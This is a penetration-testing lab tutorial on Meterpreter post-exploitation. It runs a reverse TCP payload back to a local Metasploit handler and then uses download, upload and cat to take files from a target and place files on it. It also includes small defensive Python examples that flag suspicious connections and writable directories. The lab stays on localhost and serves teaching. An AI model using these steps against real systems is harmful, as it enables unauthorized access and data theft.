Introduction
In this lab, you will learn the fundamental techniques for interacting with a target's file system using Meterpreter, an advanced payload that is part of the Metasploit Framework. Post-exploitation is a critical phase of a penetration test, and being able to navigate the file system, download sensitive files, and upload your own tools or scripts is an essential skill.
We will walk through the process of establishing a Meterpreter session and then use core commands such as ls, cd, download, upload, and cat to explore and manipulate files on the compromised system.
List files and directories with the ls command
In this step, we will first establish a Meterpreter session and then use the ls command to list the files on the target system. Our setup script has already created a payload (payload.elf) and a listener configuration file (listener.rc).
First, let's start the Metasploit listener. It will wait for an incoming connection from the payload. We use the -r flag to load our resource file, which automates the setup.
Open a terminal and run the following command:
msfconsole -r listener.rc
You will see the Metasploit console start up, and the handler will be running as a background job. The output will look similar to this:
[*] Msfconsole tip: Use the resource command to run a script of
console commands.
...
[*] Exploit running as background job 0.
[*] Started reverse TCP handler on 127.0.0.1:4444
msf6 >
Now, we need to execute the payload to connect to our listener. Open a new terminal by clicking the "+" icon in the terminal tab bar. In this new terminal, execute the payload file located in your ~/project directory.
./payload.elf
This command will produce no output. Switch back to your first terminal (the one running msfconsole). You should see a message indicating that a session has been opened.
[*] Sending stage (3021700 bytes) to 127.0.0.1
[*] Meterpreter session 1 opened (127.0.0.1:4444 -> 127.0.0.1:43916) at 2023-10-27 10:30:00 -0400
msf6 > sessions -i 1
[*] Starting interaction with 1...
meterpreter >
Note: If you are not automatically placed into the session, you can list active sessions with sessions and interact with one using sessions -i <ID>, for example, sessions -i 1.
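The session opened above is also visible from the host's side as an established TCP connection owned by payload.elf. The following is an added example, not part of the original lab: it parses a constructed `ss -tnp` sample and flags connections to the handler's port. The function names, PIDs, allowlist and the non-lab rows are assumptions made for illustration.

```python
import re

# Constructed sample of `ss -tnp` output for this lab (not captured from a real run).
# The session's addresses and ports come from the page; the PIDs, the "ruby" process
# name for msfconsole, and the sshd rows are made up for illustration.
SAMPLE_SS = '''\
State  Recv-Q Send-Q Local Address:Port  Peer Address:Port  Process
ESTAB  0      0      127.0.0.1:43916     127.0.0.1:4444     users:(("payload.elf",pid=2154,fd=3))
ESTAB  0      0      127.0.0.1:4444      127.0.0.1:43916    users:(("ruby",pid=2101,fd=9))
ESTAB  0      0      10.0.0.5:22         10.0.0.9:51234     users:(("sshd",pid=812,fd=4))
LISTEN 0      128    0.0.0.0:22          0.0.0.0:*          users:(("sshd",pid=700,fd=3))
'''

# Matches the first owner in the Process column: users:(("name",pid=N,...
PROC_RE = re.compile(r'\(\("([^"]+)",pid=(\d+)')


def parse_established(text):
    """Return one dict per ESTAB row that names its owning process."""
    conns = []
    for line in text.splitlines():
        fields = line.split()
        if len(fields) < 6 or fields[0] != "ESTAB":
            continue  # header, LISTEN rows, or rows without process info
        owner = PROC_RE.search(fields[5])
        if owner is None:
            continue
        peer_host, _, peer_port = fields[4].rpartition(":")
        conns.append({
            "process": owner.group(1),
            "pid": int(owner.group(2)),
            "peer_host": peer_host,
            "peer_port": int(peer_port),
        })
    return conns


def flag_sessions(conns, watch_ports=frozenset({4444}), allowed=frozenset({"sshd"})):
    """Flag connections to a watched peer port from a process not on the allowlist."""
    return [
        (c["process"], c["pid"], c["peer_host"], c["peer_port"])
        for c in conns
        if c["peer_port"] in watch_ports and c["process"] not in allowed
    ]


if __name__ == "__main__":
    for hit in flag_sessions(parse_established(SAMPLE_SS)):
        print("review:", hit)
```

A port match alone is a weak signal, since the listener port is configurable; treat a hit as a prompt to inspect the owning process and its executable path.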
You are now in a Meterpreter session, indicated by the meterpreter > prompt. Any command you type here is executed on the target machine. Let's use the ls command to list files in the current directory of the target.
ls
This will list the files and directories in the target's current working directory.
meterpreter > ls
Listing: /home/labex/project
============================
Mode Size Type Perms Name
---- ---- ---- ----- ----
100755/rwxr-xr-x 10152 fil rwx/- payload.elf
100644/rw-r--r-- 100 fil rw-/- listener.rc
Change directories with the cd command
In this step, you'll learn how to navigate the target's file system using the cd (change directory) command within Meterpreter. This works just like the standard Linux cd command.
Our setup script created a directory at /tmp/victim_files on the target system. Let's navigate into the /tmp directory.
cd /tmp
The command itself doesn't produce any output. To confirm that we have changed directories, we can use the pwd (print working directory) command.
pwd
The output will show your current directory on the target machine.
meterpreter > pwd
/tmp
Now that we are in the /tmp directory, let's list its contents with ls to find the victim_files directory.
ls
You should see the victim_files directory among the other files and directories in /tmp.
meterpreter > ls
Listing: /tmp
============
Mode Size Type Perms Name
---- ---- ---- ----- ----
...
40777/rwxrwxrwx 4096 dir rwx/- victim_files
...
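The Mode column in these listings pairs the octal mode with its symbolic form, and 40777 on victim_files means a directory that any user can write to, with no sticky bit to stop users removing each other's files. The following is an added example, not part of the original lab: it parses the listing format shown on this page and reports such directories. The function names are hypothetical, and the sample combines rows from the page's listings.

```python
import stat

# Constructed sample: rows copied from the listings on this page, combined under one header.
SAMPLE_LISTING = """\
Listing: /tmp
============
Mode Size Type Perms Name
---- ---- ---- ----- ----
40777/rwxrwxrwx 4096 dir rwx/- victim_files
100755/rwxr-xr-x 10152 fil rwx/- payload.elf
100644/rw-r--r-- 100 fil rw-/- listener.rc
"""


def parse_listing(text):
    """Parse the data rows of a listing; header and ruler lines are skipped."""
    entries = []
    for line in text.splitlines():
        fields = line.split(None, 4)  # the name is last and may contain spaces
        if len(fields) != 5 or "/" not in fields[0]:
            continue
        octal, symbolic = fields[0].split("/", 1)
        try:
            mode = int(octal, 8)
        except ValueError:
            continue
        entries.append({
            "name": fields[4],
            "size": int(fields[1]),
            "mode": mode,
            "is_dir": stat.S_ISDIR(mode),
            # The symbolic half should match what the octal half decodes to.
            "consistent": stat.filemode(mode)[1:] == symbolic,
        })
    return entries


def open_directories(entries):
    """Names of directories writable by everyone and lacking the sticky bit."""
    return [
        e["name"] for e in entries
        if e["is_dir"] and e["mode"] & stat.S_IWOTH and not e["mode"] & stat.S_ISVTX
    ]


if __name__ == "__main__":
    print(open_directories(parse_listing(SAMPLE_LISTING)))
```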
Download a file from the target with the download command
In this step, we will download a file from the target system to our own machine. This is a crucial technique for exfiltrating data. We will use the download command.
First, let's navigate into the victim_files directory we found in the previous step.
cd victim_files
Now, list the files in this directory to find our target file.
ls
You will see the secret_notes.txt file that was created by the setup script.
meterpreter > ls
Listing: /tmp/victim_files
=========================
Mode Size Type Perms Name
---- ---- ---- ----- ----
100644/rw-r--r-- 37 fil rw-/- secret_notes.txt
Now, let's download this file to our local ~/project directory. The syntax is download <file_on_target>. By default, it will download to your current local directory.
download secret_notes.txt
You should see a confirmation message indicating the download was successful.
[*] Downloading: secret_notes.txt -> /home/labex/project/secret_notes.txt
[*] Downloaded 37.00 B of 37.00 B (100.0%)
[*] download : /tmp/victim_files/secret_notes.txt -> /home/labex/project/secret_notes.txt
To verify, you can open a new terminal (or use the second one you opened earlier) and list the files in your ~/project directory on your local machine.
ls ~/project
You should now see secret_notes.txt in the file list.
Upload a file to the target with the upload command
In this step, you will learn how to upload a file from your machine to the target system using the upload command. This is useful for placing tools, scripts, or other payloads on the target.
First, we need a file on our local machine to upload. Let's create one. In your local shell terminal (not the Meterpreter session), run the following command to create a file named attacker_file.txt.
echo "attacker data" > ~/project/attacker_file.txt
Now, switch back to your Meterpreter session. You should still be in the /tmp/victim_files directory on the target. We will upload attacker_file.txt from our local ~/project directory to the target's current directory.
The syntax is upload <local_file_path>.
upload /home/labex/project/attacker_file.txt
You will see a confirmation that the upload was successful.
[*] uploading: /home/labex/project/attacker_file.txt -> attacker_file.txt
[*] uploaded : /home/labex/project/attacker_file.txt -> attacker_file.txt
To confirm the file is on the target, run ls in your Meterpreter session.
ls
You should now see both secret_notes.txt and your newly uploaded attacker_file.txt.
meterpreter > ls
Listing: /tmp/victim_files
=========================
Mode Size Type Perms Name
---- ---- ---- ----- ----
100644/rw-r--r-- 14 fil rw-/- attacker_file.txt
100644/rw-r--r-- 37 fil rw-/- secret_notes.txt
View the contents of a text file with the cat command
In this final step, we'll use the cat command in Meterpreter to view the contents of files directly on the target's file system without having to download them first.
You should still be in the /tmp/victim_files directory on the target within your Meterpreter session.
First, let's view the contents of the original file, secret_notes.txt.
cat secret_notes.txt
The command will print the contents of the file directly to your console.
meterpreter > cat secret_notes.txt
This is a secret file from the target.
Next, let's view the contents of the file we uploaded, attacker_file.txt, to confirm it was transferred correctly.
cat attacker_file.txt
You should see the text we created on our local machine.
meterpreter > cat attacker_file.txt
attacker data
This command is extremely useful for quickly inspecting configuration files, logs, or scripts on the target system.
Summary
Congratulations on completing this lab! You have learned the essential Meterpreter commands for interacting with a target's file system.
You successfully established a Meterpreter session and practiced the following key post-exploitation commands:
ls: To list files and directories.
cd: To navigate the file system.
pwd: To identify the current working directory.
download: To exfiltrate files from the target to your machine.
upload: To place files from your machine onto the target.
cat: To view the contents of text files directly on the target.
Mastering these commands is a fundamental step in becoming proficient with the Metasploit Framework and performing effective penetration tests.


